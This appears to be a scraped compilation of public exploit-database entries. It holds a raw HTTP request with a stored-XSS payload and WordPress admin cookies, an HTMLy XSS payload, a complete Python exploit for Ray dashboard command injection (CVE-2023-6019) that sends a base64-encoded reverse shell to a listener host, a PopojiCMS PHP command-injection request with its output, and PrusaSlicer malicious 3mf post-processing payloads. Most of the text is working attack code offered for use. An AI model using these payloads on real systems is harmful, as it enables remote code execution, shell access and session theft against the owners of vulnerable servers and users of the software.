Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 178
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000
HireHackking 
# Exploit Title: HTMLy Version v2.9.6 - Stored XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: https://www.htmly.com/
# Version 3.10.8.21 
# Date : 04/08/2024

1 ) Login admin https://127.0.0.1/HTMLy/admin/config
2 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)> 
3 ) After save it you will be see XSS alert
HireHackking 
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
#  not validated before being inserted into a system command executed in a shell, allowing
#  for arbitrary command execution. If the system is configured to allow passwordless sudo
#  (a setup some Ray configurations require) this will result in a root shell being returned
#  to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================

# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}


def check_url(target, port):
    target_url = target + ":" + port
    https = 0
    if 'http' not in target:
        try:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            test_url = 'http://' + target_url
            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
            if response.status_code != 200:
                is_https = 0
                return is_https
        except Exception as e:
            print("ERROR! The Exception is:" + format(e))
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url


def exp(target,ip,lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*]Base64 encoding payload is: " + b64_payload.decode())
    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='''
         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
        
        
        
                            ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ''',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
    args = parser.parse_args()
    # target = args.target
    ip = args.target
    # port = args.port
    # lhost = args.lhost
    # lport = args.lport
    targeturl = check_url(args.target, args.port)
    print(targeturl)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)
HireHackking 
# Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

##POC:

1 ) Login with admin cred and click settings
2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>
3 ) Open main page , you will be see id command result 


POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)
HireHackking 
# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268

==========================================================================================
1.) 3mf Metadata extension
==========================================================================================

PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.

==========================================================================================
2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```

Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.

For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:

```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```